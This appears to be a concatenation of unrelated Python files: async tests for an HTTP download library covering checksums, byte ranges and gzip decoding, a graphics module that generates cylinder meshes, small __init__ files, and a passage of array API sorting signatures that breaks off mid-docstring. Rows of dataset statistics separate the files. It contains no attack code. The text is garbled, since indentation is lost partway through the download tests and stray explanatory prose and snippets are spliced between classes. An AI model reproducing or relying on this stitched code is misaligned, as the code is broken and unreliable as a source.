        download = download_mod.RawDownload(sync_test.EXAMPLE_URL, stream=stream)
        chunk1 = b"right now, "
        chunk2 = b"but a little later"
        response = _mock_raw_response(chunks=[chunk1, chunk2], headers={})
        ret_val = await download._write_to_stream(response)
        assert ret_val is None
        assert stream.getvalue() == chunk1 + chunk2

    @pytest.mark.parametrize("checksum", ["md5", "crc32c"])
    @pytest.mark.asyncio
    async def test__write_to_stream_with_hash_check_success(self, checksum):
        stream = io.BytesIO()
        download = download_mod.RawDownload(
            sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
        )
        chunk1 = b"first chunk, count starting at 0. "
        chunk2 = b"second chunk, or chunk 1, which is better? "
        chunk3 = b"ordinals and numerals and stuff."
        header_value = "crc32c=qmNCyg==,md5=fPAJHnnoi/+NadyNxT2c2w=="
        headers = {_helpers._HASH_HEADER: header_value}
        response = _mock_raw_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
        ret_val = await download._write_to_stream(response)
        assert ret_val is None
        assert stream.getvalue() == chunk1 + chunk2 + chunk3

    @pytest.mark.parametrize("checksum", ["md5", "crc32c"])
    @pytest.mark.asyncio
    async def test__write_to_stream_with_hash_check_fail(self, checksum):
        stream = io.BytesIO()
        download = download_mod.RawDownload(
            sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
        )
        chunk1 = b"first chunk, count starting at 0. "
        chunk2 = b"second chunk, or chunk 1, which is better? "
        chunk3 = b"ordinals and numerals and stuff."
        bad_checksum = "d3JvbmcgbiBtYWRlIHVwIQ=="
        header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
        headers = {_helpers._HASH_HEADER: header_value}
        response = _mock_raw_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
        with pytest.raises(common.DataCorruption) as exc_info:
            await download._write_to_stream(response)
        assert not download.finished
        error = exc_info.value
        assert error.response is response
        assert len(error.args) == 1
        if checksum == "md5":
            good_checksum = "fPAJHnnoi/+NadyNxT2c2w=="
        else:
            good_checksum = "qmNCyg=="
        msg = download_mod._CHECKSUM_MISMATCH.format(
            sync_test.EXAMPLE_URL,
            bad_checksum,
            good_checksum,
            checksum_type=checksum.upper(),
        )
        assert error.args[0] == msg

    @pytest.mark.asyncio
    async def test__write_to_stream_with_invalid_checksum_type(self):
        BAD_CHECKSUM_TYPE = "badsum"
        stream = io.BytesIO()
        download = download_mod.RawDownload(
            sync_test.EXAMPLE_URL, stream=stream, checksum=BAD_CHECKSUM_TYPE
        )
        chunk1 = b"first chunk, count starting at 0. "
        chunk2 = b"second chunk, or chunk 1, which is better? "
        chunk3 = b"ordinals and numerals and stuff."
        bad_checksum = "d3JvbmcgbiBtYWRlIHVwIQ=="
        header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
        headers = {_helpers._HASH_HEADER: header_value}
        response = _mock_response(chunks=[chunk1, chunk2, chunk3], headers=headers)
        with pytest.raises(ValueError) as exc_info:
            await download._write_to_stream(response)
        assert not download.finished
        error = exc_info.value
        assert error.args[0] == "checksum must be ``'md5'``, ``'crc32c'`` or ``None``"

    async def _consume_helper(
        self,
        stream=None,
        end=65536,
        headers=None,
        chunks=(),
        response_headers=None,
        checksum=None,
        timeout=None,
    ):
        download = download_mod.RawDownload(
            sync_test.EXAMPLE_URL, stream=stream, end=end, headers=headers
        )
        transport = mock.AsyncMock(spec=["request"])
        mockResponse = _mock_raw_response(chunks=chunks, headers=response_headers)
        transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
        assert not download.finished
        ret_val = await download.consume(transport)
        assert ret_val is transport.request.return_value
        if chunks:
            assert stream is not None
        transport.request.assert_called_once_with(
            "GET",
            sync_test.EXAMPLE_URL,
            data=None,
            headers=download._headers,
            timeout=EXPECTED_TIMEOUT,
        )
        range_bytes = "bytes={:d}-{:d}".format(0, end)
        assert download._headers["range"] == range_bytes
        assert download.finished
        return transport

    @pytest.mark.asyncio
    async def test_consume(self):
        await self._consume_helper()

    @pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
    @pytest.mark.asyncio
    async def test_consume_with_stream(self, checksum):
        stream = io.BytesIO()
        chunks = (b"up down ", b"charlie ", b"brown")
        await self._consume_helper(stream=stream, chunks=chunks, checksum=checksum)
        assert stream.getvalue() == b"".join(chunks)

    @pytest.mark.parametrize("checksum", ["md5", "crc32c", None])
    @pytest.mark.asyncio
    async def test_consume_with_stream_hash_check_success(self, checksum):
        stream = io.BytesIO()
        chunks = (b"up down ", b"charlie ", b"brown")
        header_value = "crc32c=UNIQxg==,md5=JvS1wjMvfbCXgEGeaJJLDQ=="
        headers = {_helpers._HASH_HEADER: header_value}
        await self._consume_helper(
            stream=stream, chunks=chunks, response_headers=headers, checksum=checksum
        )
        assert stream.getvalue() == b"".join(chunks)

    @pytest.mark.parametrize("checksum", ["md5", "crc32c"])
    @pytest.mark.asyncio
    async def test_consume_with_stream_hash_check_fail(self, checksum):
        stream = io.BytesIO()
        download = download_mod.RawDownload(
            sync_test.EXAMPLE_URL, stream=stream, checksum=checksum
        )
        chunks = (b"zero zero", b"niner tango")
        bad_checksum = "anVzdCBub3QgdGhpcyAxLA=="
        header_value = "crc32c={bad},md5={bad}".format(bad=bad_checksum)
        headers = {_helpers._HASH_HEADER: header_value}
        transport = mock.AsyncMock(spec=["request"])
        mockResponse = _mock_raw_response(chunks=chunks, headers=headers)
        transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
        assert not download.finished
        with pytest.raises(common.DataCorruption) as exc_info:
            await download.consume(transport)
assert stream.getvalue() == b"".join(chunks)
assert download.finished
assert download._headers == {}
error = exc_info.value
assert error.response is transport.request.return_value
assert len(error.args) == 1
if checksum == "md5":
good_checksum = "1A/dxEpys717C6FH7FIWDw=="
else:
good_checksum = "GvNZlg=="
msg = download_mod._CHECKSUM_MISMATCH.format(
sync_test.EXAMPLE_URL,
bad_checksum,
good_checksum,
checksum_type=checksum.upper(),
)
assert error.args[0] == msg
# Check mocks.
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers={},
timeout=EXPECTED_TIMEOUT,
)
@pytest.mark.asyncio
async def test_consume_with_headers(self):
headers = {} # Empty headers
end = 16383
await self._consume_helper(end=end, headers=headers)
range_bytes = "bytes={:d}-{:d}".format(0, end)
# Make sure the headers have been modified.
assert headers == {"range": range_bytes}
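The hard-coded "good" checksums in the hash-check-fail tests above are base64-encoded digests of the full downloaded payload. A minimal standalone sketch of how such a value is produced (hashlib and base64 are stdlib; the crc32c variant would additionally need a third-party library such as google-crc32c, which is not shown here):

```python
import base64
import hashlib

# Same payload as test_consume_with_stream_hash_check_fail above.
payload = b"zero zero" + b"niner tango"
digest = hashlib.md5(payload).digest()               # 16 raw bytes
checksum = base64.b64encode(digest).decode("utf-8")

# A base64-encoded MD5 digest is always 24 characters ending in "==".
assert len(checksum) == 24 and checksum.endswith("==")
```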
class TestChunkedDownload(object):
@staticmethod
def _response_content_range(start_byte, end_byte, total_bytes):
return "bytes {:d}-{:d}/{:d}".format(start_byte, end_byte, total_bytes)
def _response_headers(self, start_byte, end_byte, total_bytes):
content_length = end_byte - start_byte + 1
resp_range = self._response_content_range(start_byte, end_byte, total_bytes)
return {
"content-length": "{:d}".format(content_length),
"content-range": resp_range,
}
def _mock_response(
self, start_byte, end_byte, total_bytes, content=None, status_code=None
):
response_headers = self._response_headers(start_byte, end_byte, total_bytes)
content_stream = mock.AsyncMock(spec=["__call__", "read"])
content_stream.read = mock.AsyncMock(spec=["__call__"], return_value=content)
return mock.AsyncMock(
content=content_stream,
_headers=response_headers,
headers=response_headers,
status=status_code,
spec=["content", "headers", "status"],
)
@pytest.mark.asyncio
async def test_consume_next_chunk_already_finished(self):
download = download_mod.ChunkedDownload(sync_test.EXAMPLE_URL, 512, None)
download._finished = True
with pytest.raises(ValueError):
await download.consume_next_chunk(None)
def _mock_transport(self, start, chunk_size, total_bytes, content=b""):
transport = mock.AsyncMock(spec=["request"])
assert len(content) == chunk_size
mockResponse = self._mock_response(
start,
start + chunk_size - 1,
total_bytes,
content=content,
status_code=int(http.client.OK),
)
transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
return transport
@pytest.mark.asyncio
async def test_consume_next_chunk(self):
start = 1536
stream = io.BytesIO()
data = b"Just one chunk."
chunk_size = len(data)
download = download_mod.ChunkedDownload(
sync_test.EXAMPLE_URL, chunk_size, stream, start=start
)
total_bytes = 16384
transport = self._mock_transport(start, chunk_size, total_bytes, content=data)
# Verify the internal state before consuming a chunk.
assert not download.finished
assert download.bytes_downloaded == 0
assert download.total_bytes is None
# Actually consume the chunk and check the output.
ret_val = await download.consume_next_chunk(transport)
assert ret_val is transport.request.return_value
range_bytes = "bytes={:d}-{:d}".format(start, start + chunk_size - 1)
download_headers = {"range": range_bytes}
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download_headers,
timeout=EXPECTED_TIMEOUT,
)
assert stream.getvalue() == data
# Go back and check the internal state after consuming the chunk.
assert not download.finished
assert download.bytes_downloaded == chunk_size
assert download.total_bytes == total_bytes
@pytest.mark.asyncio
async def test_consume_next_chunk_with_custom_timeout(self):
start = 1536
stream = io.BytesIO()
data = b"Just one chunk."
chunk_size = len(data)
download = download_mod.ChunkedDownload(
sync_test.EXAMPLE_URL, chunk_size, stream, start=start
)
total_bytes = 16384
transport = self._mock_transport(start, chunk_size, total_bytes, content=data)
# Actually consume the chunk and check the output.
await download.consume_next_chunk(transport, timeout=14.7)
range_bytes = "bytes={:d}-{:d}".format(start, start + chunk_size - 1)
download_headers = {"range": range_bytes}
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download_headers,
timeout=14.7,
)
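The mocks above exercise two different header grammars: the request carries `range: bytes=start-end` while the response carries `content-range: bytes start-end/total`. A small standalone round-trip of the exact format strings used by these tests:

```python
start, end, total = 1536, 1550, 16384

request_range = "bytes={:d}-{:d}".format(start, end)
content_range = "bytes {:d}-{:d}/{:d}".format(start, end, total)

# Parse the response header back into its three numbers.
span, total_str = content_range.split(" ")[1].split("/")
lo, hi = (int(part) for part in span.split("-"))

assert request_range == "bytes=1536-1550"
assert (lo, hi, int(total_str)) == (start, end, total)
assert hi - lo + 1 == 15   # matches the mocked content-length
```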
class TestRawChunkedDownload(object):
@staticmethod
def _response_content_range(start_byte, end_byte, total_bytes):
return "bytes {:d}-{:d}/{:d}".format(start_byte, end_byte, total_bytes)
def _response_headers(self, start_byte, end_byte, total_bytes):
content_length = end_byte - start_byte + 1
resp_range = self._response_content_range(start_byte, end_byte, total_bytes)
return {
"content-length": "{:d}".format(content_length),
"content-range": resp_range,
}
def _mock_response(
self, start_byte, end_byte, total_bytes, content=None, status_code=None
):
response_headers = self._response_headers(start_byte, end_byte, total_bytes)
content_stream = mock.AsyncMock(spec=["__call__", "read"])
content_stream.read = mock.AsyncMock(spec=["__call__"], return_value=content)
return mock.AsyncMock(
content=content_stream,
_headers=response_headers,
headers=response_headers,
status=status_code,
spec=["_headers", "content", "headers", "status"],
)
@pytest.mark.asyncio
async def test_consume_next_chunk_already_finished(self):
download = download_mod.RawChunkedDownload(sync_test.EXAMPLE_URL, 512, None)
download._finished = True
with pytest.raises(ValueError):
await download.consume_next_chunk(None)
def _mock_transport(self, start, chunk_size, total_bytes, content=b""):
transport = mock.AsyncMock(spec=["request"])
assert len(content) == chunk_size
mockResponse = self._mock_response(
start,
start + chunk_size - 1,
total_bytes,
content=content,
status_code=int(http.client.OK),
)
transport.request = mock.AsyncMock(spec=["__call__"], return_value=mockResponse)
return transport
@pytest.mark.asyncio
async def test_consume_next_chunk(self):
start = 1536
stream = io.BytesIO()
data = b"Just one chunk."
chunk_size = len(data)
download = download_mod.RawChunkedDownload(
sync_test.EXAMPLE_URL, chunk_size, stream, start=start
)
total_bytes = 16384
transport = self._mock_transport(start, chunk_size, total_bytes, content=data)
# Verify the internal state before consuming a chunk.
assert not download.finished
assert download.bytes_downloaded == 0
assert download.total_bytes is None
# Actually consume the chunk and check the output.
ret_val = await download.consume_next_chunk(transport)
assert ret_val is transport.request.return_value
range_bytes = "bytes={:d}-{:d}".format(start, start + chunk_size - 1)
download_headers = {"range": range_bytes}
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download_headers,
timeout=EXPECTED_TIMEOUT,
)
assert stream.getvalue() == data
# Go back and check the internal state after consuming the chunk.
assert not download.finished
assert download.bytes_downloaded == chunk_size
assert download.total_bytes == total_bytes
@pytest.mark.asyncio
async def test_consume_next_chunk_with_custom_timeout(self):
start = 1536
stream = io.BytesIO()
data = b"Just one chunk."
chunk_size = len(data)
download = download_mod.RawChunkedDownload(
sync_test.EXAMPLE_URL, chunk_size, stream, start=start
)
total_bytes = 16384
transport = self._mock_transport(start, chunk_size, total_bytes, content=data)
# Actually consume the chunk and check the output.
await download.consume_next_chunk(transport, timeout=14.7)
range_bytes = "bytes={:d}-{:d}".format(start, start + chunk_size - 1)
download_headers = {"range": range_bytes}
transport.request.assert_called_once_with(
"GET",
sync_test.EXAMPLE_URL,
data=None,
headers=download_headers,
timeout=14.7,
)
assert stream.getvalue() == data
# Go back and check the internal state after consuming the chunk.
assert not download.finished
assert download.bytes_downloaded == chunk_size
assert download.total_bytes == total_bytes
class Test__add_decoder(object):
def test_non_gzipped(self):
response_raw = mock.AsyncMock(headers={}, spec=["headers"])
md5_hash = download_mod._add_decoder(response_raw, mock.sentinel.md5_hash)
assert md5_hash is mock.sentinel.md5_hash
def test_gzipped(self):
headers = {"content-encoding": "gzip"}
response_raw = mock.AsyncMock(headers=headers, spec=["headers", "_decoder"])
md5_hash = download_mod._add_decoder(response_raw, mock.sentinel.md5_hash)
assert md5_hash is not mock.sentinel.md5_hash
assert isinstance(md5_hash, _helpers._DoNothingHash)
assert isinstance(response_raw._decoder, download_mod._GzipDecoder)
assert response_raw._decoder._checksum is mock.sentinel.md5_hash
class Test_GzipDecoder(object):
def test_constructor(self):
decoder = download_mod._GzipDecoder(mock.sentinel.md5_hash)
assert decoder._checksum is mock.sentinel.md5_hash
def test_decompress(self):
md5_hash = mock.Mock(spec=["update"])
decoder = download_mod._GzipDecoder(md5_hash)
data = b"\x1f\x8b\x08\x08"
result = decoder.decompress(data)
assert result == b""
md5_hash.update.assert_called_once_with(data)
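The `b"\x1f\x8b\x08\x08"` payload in the test above is only a gzip header fragment, so decompressing it yields nothing while the checksum still sees the compressed bytes. Assuming `_GzipDecoder` wraps an incremental zlib-based gzip decoder, the stdlib equivalent of that incremental behaviour can be sketched as:

```python
import gzip
import zlib

blob = gzip.compress(b"hello")

# 16 + MAX_WBITS tells zlib to expect gzip framing, not a raw zlib stream.
decoder = zlib.decompressobj(16 + zlib.MAX_WBITS)

out = decoder.decompress(blob[:4])    # magic + method + flags only
assert out == b""                     # a bare header yields no payload

out += decoder.decompress(blob[4:])   # rest of the gzip member
assert out == b"hello"
```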
class AsyncIter:
def __init__(self, items):
self.items = items
async def __aiter__(self):
for item in self.items:
yield item
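`AsyncIter` works with `async for` because an `async def __aiter__` containing `yield` returns an async generator, which already implements `__anext__`. A quick standalone check (the class is repeated here so the sketch runs on its own):

```python
import asyncio

class AsyncIter:
    def __init__(self, items):
        self.items = items

    async def __aiter__(self):
        for item in self.items:
            yield item

async def collect(aiterable):
    return [chunk async for chunk in aiterable]

chunks = asyncio.run(collect(AsyncIter([b"first ", b"second"])))
assert b"".join(chunks) == b"first second"
```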
def _mock_response(status=http.client.OK, chunks=(), headers=None):
if headers is None:
headers = {}
if chunks:
chunklist = b"".join(chunks)
stream_content = mock.AsyncMock(spec=["__call__", "read", "iter_chunked"])
stream_content.read = mock.AsyncMock(spec=["__call__"], return_value=chunklist)
stream_content.iter_chunked.return_value = AsyncIter(chunks)
mock_raw = mock.AsyncMock(headers=headers, spec=["headers"])
response = mock.AsyncMock(
_headers=headers,
headers=headers,
status=int(status),
raw=mock_raw,
content=stream_content,
spec=[
"__aenter__",
"__aexit__",
"_headers",
"iter_chunked",
"status",
"headers",
"raw",
"content",
],
)
# i.e. context manager returns ``self``.
response.__aenter__.return_value = response
response.__aexit__.return_value = None
return response
else:
return mock.AsyncMock(
_headers=headers,
headers=headers,
status=int(status),
spec=["_headers", "status", "headers"],
)
def _mock_raw_response(status_code=http.client.OK, chunks=(), headers=None):
if headers is None:
headers = {}
chunklist = b"".join(chunks)
stream_content = mock.AsyncMock(spec=["__call__", "read", "iter_chunked"])
stream_content.read = mock.AsyncMock(spec=["__call__"], return_value=chunklist)
stream_content.iter_chunked.return_value = AsyncIter(chunks)
mock_raw = mock.AsyncMock(_headers=headers, headers=headers, spec=["__call__"])
response = mock.AsyncMock(
_headers=headers,
headers=headers,
status=int(status_code),
raw=mock_raw,
content=stream_content,
spec=[
"__aenter__",
"__aexit__",
"_headers",
"iter_chunked",
"status",
"headers",
"raw",
"content",
],
)
# i.e. context manager returns ``self``.
response.__aenter__.return_value = response
response.__aexit__.return_value = None
return response
| 36.626829 | 97 | 0.640274 | 3,418 | 30,034 | 5.368637 | 0.082797 | 0.019619 | 0.024523 | 0.029428 | 0.912752 | 0.902125 | 0.898529 | 0.886649 | 0.880381 | 0.87733 | 0 | 0.01345 | 0.259839 | 30,034 | 819 | 98 | 36.671551 | 0.812011 | 0.044749 | 0 | 0.827273 | 0 | 0 | 0.089085 | 0.019122 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.022727 | false | 0 | 0.013636 | 0.00303 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60df17ec632fc37395acfa39eba113404b86cd00 | 6,077 | py | Python | Tarea2b - CrazyRacer/local_shapes.py | Nicolas-Francisco/Computer-Graphics | 1895f3188c9ff662148a42c082a7191e2c83a06a | [
"CC-BY-4.0"
] | null | null | null | Tarea2b - CrazyRacer/local_shapes.py | Nicolas-Francisco/Computer-Graphics | 1895f3188c9ff662148a42c082a7191e2c83a06a | [
"CC-BY-4.0"
] | null | null | null | Tarea2b - CrazyRacer/local_shapes.py | Nicolas-Francisco/Computer-Graphics | 1895f3188c9ff662148a42c082a7191e2c83a06a | [
"CC-BY-4.0"
] | null | null | null | """ Local shapes module, containing the logic for creating shapes"""
import numpy as np
import basic_shapes as bs
def createColorTriangleIndexation(start_index, a, b, c, color):
# Defining locations and colors for each vertex of the shape
vertices = [
# positions colors
a[0], a[1], a[2], color[0], color[1], color[2],
b[0], b[1], b[2], color[0], color[1], color[2],
c[0], c[1], c[2], color[0], color[1], color[2]
]
# Defining connections among vertices
# We have a triangle every 3 indices specified
indices = [
start_index, start_index+1, start_index+2
]
return (vertices, indices)
def createColorNormalsTriangleIndexation(start_index, a, b, c, color):
# Computing normal from a b c
v1 = np.array([a_v - b_v for a_v, b_v in zip(a, b)])
v2 = np.array([b_v - c_v for b_v, c_v in zip(b, c)])
v1xv2 = np.cross(v1, v2)
# Defining locations and colors for each vertex of the shape
vertices = [
# positions colors normals
a[0], a[1], a[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
b[0], b[1], b[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
c[0], c[1], c[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2]
]
# Defining connections among vertices
# We have a triangle every 3 indices specified
indices = [
start_index, start_index+1, start_index+2
]
return (vertices, indices)
def createColorQuadIndexation(start_index, a, b, c, d, color):
# Defining locations and colors for each vertex of the shape
vertices = [
# positions colors
a[0], a[1], a[2], color[0], color[1], color[2],
b[0], b[1], b[2], color[0], color[1], color[2],
c[0], c[1], c[2], color[0], color[1], color[2],
d[0], d[1], d[2], color[0], color[1], color[2]
]
# Defining connections among vertices
# We have a triangle every 3 indices specified
indices = [
start_index, start_index+1, start_index+2,
start_index+2, start_index+3, start_index
]
return (vertices, indices)
def createColorNormalsQuadIndexation(start_index, a, b, c, d, color):
# Computing normal from a b c
v1 = np.array(a-b)
v2 = np.array(b-c)
v1xv2 = np.cross(v1, v2)
# Defining locations and colors for each vertex of the shape
vertices = [
# positions colors normals
a[0], a[1], a[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
b[0], b[1], b[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
c[0], c[1], c[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2],
d[0], d[1], d[2], color[0], color[1], color[2], v1xv2[0], v1xv2[1], v1xv2[2]
]
# Defining connections among vertices
# We have a triangle every 3 indices specified
indices = [
start_index, start_index+1, start_index+2,
start_index+2, start_index+3, start_index
]
return (vertices, indices)
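Both `...Normals...` helpers derive one flat normal per face from the cross product of two edge vectors, (a - b) x (b - c), and assign it to every vertex of the face. For a quad lying in the xy-plane that cross product points along +z, which a dependency-free sketch can confirm:

```python
def cross(u, v):
    # 3-D cross product of two edge vectors.
    return (u[1] * v[2] - u[2] * v[1],
            u[2] * v[0] - u[0] * v[2],
            u[0] * v[1] - u[1] * v[0])

a, b, c = (0, 0, 0), (1, 0, 0), (1, 1, 0)
v1 = tuple(p - q for p, q in zip(a, b))   # a - b = (-1, 0, 0)
v2 = tuple(p - q for p, q in zip(b, c))   # b - c = (0, -1, 0)

normal = cross(v1, v2)
assert normal == (0, 0, 1)   # flat +z normal shared by the whole face
```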
# Answer key
def generateCylinder(latitudes, color, R = 1.0, z_top=1.0, z_bottom=0.0):
vertices = []
indices = []
# Angle step
dtheta = 2 * np.pi / latitudes
theta = 0
start_index = 0
# We generate a rectangle for every latitude,
for _ in range(latitudes):
# d === c
# | |
# | |
# a === b
a = np.array([R*np.cos(theta), R*np.sin(theta), z_bottom])
b = np.array([R*np.cos(theta + dtheta), R*np.sin(theta + dtheta), z_bottom])
c = np.array([R*np.cos(theta + dtheta), R*np.sin(theta + dtheta), z_top])
d = np.array([R*np.cos(theta), R*np.sin(theta), z_top])
theta = theta + dtheta
_vertex, _indices = createColorQuadIndexation(start_index, a, b, c, d, color)
vertices += _vertex
indices += _indices
start_index += 4
# add top cover
theta = 0
dtheta = 2 * np.pi / 15
for _ in range(15):
# Top
a = [0, 0, z_top]
b = [R * np.cos(theta), R * np.sin(theta), z_top]
c = [R * np.cos(theta + dtheta), R * np.sin(theta + dtheta), z_top]
_vertex, _indices = createColorTriangleIndexation(start_index, a, b, c, color)
vertices += _vertex
indices += _indices
start_index += 3
theta += dtheta
return bs.Shape(vertices, indices)
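The side wall above places quad corners on two circles of radius R, one at z_bottom and one at z_top, stepping the angle by dtheta per latitude. A standalone sketch of that ring parametrization:

```python
import math

def ring(latitudes, R=1.0, z=0.0):
    # One corner per latitude, evenly spaced around a circle of radius R.
    dtheta = 2 * math.pi / latitudes
    return [(R * math.cos(i * dtheta), R * math.sin(i * dtheta), z)
            for i in range(latitudes)]

pts = ring(8, R=2.0, z=1.0)
assert len(pts) == 8
# Every corner sits on the circle of radius R at height z.
assert all(abs(x * x + y * y - 4.0) < 1e-9 for x, y, _ in pts)
assert all(z == 1.0 for _, _, z in pts)
```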
# Cylinder with normals
def generateNormalsCylinder(latitudes, color, R = 1.0, z_top=1.0, z_bottom=0.0):
vertices = []
indices = []
# Angle step
dtheta = 2 * np.pi / latitudes
theta = 0
start_index = 0
# We generate a rectangle for every latitude,
for _ in range(latitudes):
# d === c
# | |
# | |
# a === b
a = np.array([R*np.cos(theta), R*np.sin(theta), z_bottom])
b = np.array([R*np.cos(theta + dtheta), R*np.sin(theta + dtheta), z_bottom])
c = np.array([R*np.cos(theta + dtheta), R*np.sin(theta + dtheta), z_top])
d = np.array([R*np.cos(theta), R*np.sin(theta), z_top])
theta = theta + dtheta
_vertex, _indices = createColorNormalsQuadIndexation(start_index, a, b, c, d, color)
vertices += _vertex
indices += _indices
start_index += 4
# add top cover
theta = 0
dtheta = 2 * np.pi / 15
for _ in range(15):
# Top
a = [0, 0, z_top]
b = [R * np.cos(theta), R * np.sin(theta), z_top]
c = [R * np.cos(theta + dtheta), R * np.sin(theta + dtheta), z_top]
_vertex, _indices = createColorNormalsTriangleIndexation(start_index, a, b, c, color)
vertices += _vertex
indices += _indices
start_index += 3
theta += dtheta
return bs.Shape(vertices, indices) | 30.691919 | 93 | 0.558828 | 886 | 6,077 | 3.73702 | 0.098194 | 0.114769 | 0.029598 | 0.05074 | 0.942616 | 0.942616 | 0.935971 | 0.888855 | 0.845968 | 0.845968 | 0 | 0.050891 | 0.298338 | 6,077 | 198 | 94 | 30.691919 | 0.72561 | 0.189896 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.018182 | 0 | 0.127273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60f814f2683c930386abd3090da71a7f3af8d411 | 46 | py | Python | api/src/services/__init__.py | philipguedes/network-meeseeks | 67210134e4c9baa74cf403bc35c567e9b7ead7b5 | [
"MIT"
] | null | null | null | api/src/services/__init__.py | philipguedes/network-meeseeks | 67210134e4c9baa74cf403bc35c567e9b7ead7b5 | [
"MIT"
] | null | null | null | api/src/services/__init__.py | philipguedes/network-meeseeks | 67210134e4c9baa74cf403bc35c567e9b7ead7b5 | [
"MIT"
] | null | null | null | import src.services.neubot
import src.adapters | 23 | 26 | 0.869565 | 7 | 46 | 5.714286 | 0.714286 | 0.45 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 46 | 2 | 27 | 23 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
714f08bc4682588512523b6356b0148b1d4f24a4 | 44 | py | Python | __init__.py | camkay/cis410_library | 51c4e56f3d70a4145a9967cb2ac794f33a2493ea | [
"MIT"
] | null | null | null | __init__.py | camkay/cis410_library | 51c4e56f3d70a4145a9967cb2ac794f33a2493ea | [
"MIT"
] | null | null | null | __init__.py | camkay/cis410_library | 51c4e56f3d70a4145a9967cb2ac794f33a2493ea | [
"MIT"
] | null | null | null | from cis410_library.cis410_library import *
| 22 | 43 | 0.863636 | 6 | 44 | 6 | 0.666667 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 0.090909 | 44 | 1 | 44 | 44 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
715a3e81711d2c1c2ce2367d53039398212fd1ad | 2,289 | py | Python | spec/API_specification/signatures/sorting_functions.py | cnpryer/array-api | 02fa9237eab3258120778baec12cd38cfd309ee3 | [
"MIT"
] | 98 | 2020-11-10T15:24:46.000Z | 2022-03-29T02:40:54.000Z | spec/API_specification/signatures/sorting_functions.py | cnpryer/array-api | 02fa9237eab3258120778baec12cd38cfd309ee3 | [
"MIT"
] | 269 | 2020-11-10T17:29:41.000Z | 2022-03-30T15:38:47.000Z | spec/API_specification/signatures/sorting_functions.py | cnpryer/array-api | 02fa9237eab3258120778baec12cd38cfd309ee3 | [
"MIT"
] | 24 | 2020-11-10T20:53:55.000Z | 2022-03-28T01:58:12.000Z | from ._types import array
def argsort(x: array, /, *, axis: int = -1, descending: bool = False, stable: bool = True) -> array:
"""
Returns the indices that sort an array ``x`` along a specified axis.
Parameters
----------
x : array
input array.
axis: int
axis along which to sort. If set to ``-1``, the function must sort along the last axis. Default: ``-1``.
descending: bool
sort order. If ``True``, the returned indices sort ``x`` in descending order (by value). If ``False``, the returned indices sort ``x`` in ascending order (by value). Default: ``False``.
stable: bool
sort stability. If ``True``, the returned indices must maintain the relative order of ``x`` values which compare as equal. If ``False``, the returned indices may or may not maintain the relative order of ``x`` values which compare as equal (i.e., the relative order of ``x`` values which compare as equal is implementation-dependent). Default: ``True``.
Returns
-------
out : array
an array of indices. The returned array must have the same shape as ``x``. The returned array must have the default array index data type.
"""
def sort(x: array, /, *, axis: int = -1, descending: bool = False, stable: bool = True) -> array:
"""
Returns a sorted copy of an input array ``x``.
Parameters
----------
x: array
input array.
axis: int
axis along which to sort. If set to ``-1``, the function must sort along the last axis. Default: ``-1``.
descending: bool
sort order. If ``True``, the array must be sorted in descending order (by value). If ``False``, the array must be sorted in ascending order (by value). Default: ``False``.
stable: bool
